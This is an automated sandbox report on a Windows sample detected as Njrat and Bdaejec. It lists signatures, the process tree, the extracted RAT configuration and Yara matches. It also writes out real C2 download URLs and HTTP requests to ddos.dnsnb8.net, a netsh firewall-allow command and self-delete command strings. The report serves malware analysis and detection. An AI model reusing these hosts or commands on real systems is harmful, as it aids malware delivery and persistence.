Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_366.exe

Overview

General Information

Sample name:LisectAVT_2403002B_366.exe
Analysis ID:1481747
MD5:16ab569e9d84f0a2c9aacd47d4998d84
SHA1:df051511743f94a52bdbc270c4e5bf0d303d6975
SHA256:7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
Tags:exeWormRamnit
Infos:

Detection

Bdaejec, Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected Njrat
AI detected suspicious sample
Disables zone checking for all users
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002B_366.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)
    • RRqyIX.exe (PID: 4888 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • server.exe (PID: 6864 cmdline: "C:\Users\user\AppData\Local\Temp\server.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)
      • netsh.exe (PID: 6776 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe (PID: 4068 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)
    • RRqyIX.exe (PID: 1216 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 364 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Microsoft Corporation.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)
    • RRqyIX.exe (PID: 64 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 5324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
      • 0x113d2:$a1: get_Registry
      • 0x15827:$a2: SEE_MASK_NOZONECHECKS
      • 0x154c9:$a3: Download ERROR
      • 0x15a79:$a4: cmd.exe /c ping 0 -n 2 & del "
      • 0x13a06:$a5: netsh firewall delete allowedprogram "
      00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
      • 0x15827:$reg: SEE_MASK_NOZONECHECKS
      • 0x154ad:$msg: Execute ERROR
      • 0x15501:$msg: Execute ERROR
      • 0x15a79:$ping: cmd.exe /c ping 0 -n 2 & del
      Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620JoeSecurity_NjratYara detected NjratJoe Security
        Click to see the 6 entries
        SourceRuleDescriptionAuthorStrings
        0.2.LisectAVT_2403002B_366.exe.600000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
          0.2.LisectAVT_2403002B_366.exe.600000.0.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
          • 0x133d2:$a1: get_Registry
          • 0x17827:$a2: SEE_MASK_NOZONECHECKS
          • 0x174c9:$a3: Download ERROR
          • 0x17a79:$a4: cmd.exe /c ping 0 -n 2 & del "
          • 0x15a06:$a5: netsh firewall delete allowedprogram "
          0.2.LisectAVT_2403002B_366.exe.600000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
          • 0x17827:$reg: SEE_MASK_NOZONECHECKS
          • 0x174ad:$msg: Execute ERROR
          • 0x17501:$msg: Execute ERROR
          • 0x17a79:$ping: cmd.exe /c ping 0 -n 2 & del
          0.2.LisectAVT_2403002B_366.exe.600000.0.unpackMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
          • 0x15a06:$s1: netsh firewall delete allowedprogram
          • 0x15a58:$s2: netsh firewall add allowedprogram
          • 0x17a79:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
          • 0x174ad:$s4: Execute ERROR
          • 0x17501:$s4: Execute ERROR
          • 0x174c9:$s5: Download ERROR

          System Summary

          barindex
          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
          No Snort rule has matched
          Timestamp:2024-07-25T13:56:12.378551+0200
          SID:2807908
          Source Port:49723
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:55:53.012404+0200
          SID:2807908
          Source Port:49711
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:00.834389+0200
          SID:2028371
          Source Port:49716
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-25T13:56:15.343441+0200
          SID:2807908
          Source Port:49726
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:21.691262+0200
          SID:2807908
          Source Port:49729
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:26.240091+0200
          SID:2807908
          Source Port:49731
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:18.589198+0200
          SID:2807908
          Source Port:49728
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:55:52.186327+0200
          SID:2838522
          Source Port:64724
          Destination Port:53
          Protocol:UDP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:46.196032+0200
          SID:2022930
          Source Port:443
          Destination Port:49738
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T13:55:56.754164+0200
          SID:2807908
          Source Port:49712
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-25T13:56:08.565178+0200
          SID:2022930
          Source Port:443
          Destination Port:49720
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: LisectAVT_2403002B_366.exeAvira: detected
          Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k2.rar86)Avira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarZAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarMAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarzOAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarHAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k3.raraAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar#OAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar_Avira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarPOAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k4.rar$Avira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar1Avira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rareMAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k2.rar5Avira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k4.rarAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarnAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarEAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarRAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rardAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarp6Avira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k3.rarxAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarcAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k2.rarMAvira URL Cloud: Label: phishing
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Notepad.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Users\user\AppData\Local\Temp\server.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\Explower.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpackMalware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
          Source: Yara matchFile source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Notepad.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\server.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeJoe Sandbox ML: detected
          Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Explower.exeJoe Sandbox ML: detected
          Source: LisectAVT_2403002B_366.exeJoe Sandbox ML: detected

          Compliance

          barindex
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeUnpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
          Source: LisectAVT_2403002B_366.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

          Spreading

          barindex
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: LisectAVT_2403002B_366.exeBinary or memory string: [autorun]
          Source: LisectAVT_2403002B_366.exeBinary or memory string: \autorun.inf
          Source: LisectAVT_2403002B_366.exeBinary or memory string: autorun.inf
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: \autorun.inf
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00AE29E2
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_009E9998 FindFirstFileW,4_2_009E9998
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_009F9998 FindFirstFileW,14_2_009F9998
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_00A329E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00979998 FindFirstFileW,21_2_00979998
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,22_2_005129E2
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00AE2B8C
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

          Networking

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
          Source: global trafficTCP traffic: 192.168.2.6:49711 -> 44.221.84.105:799
          Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00AE1099
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
          Source: RRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
          Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
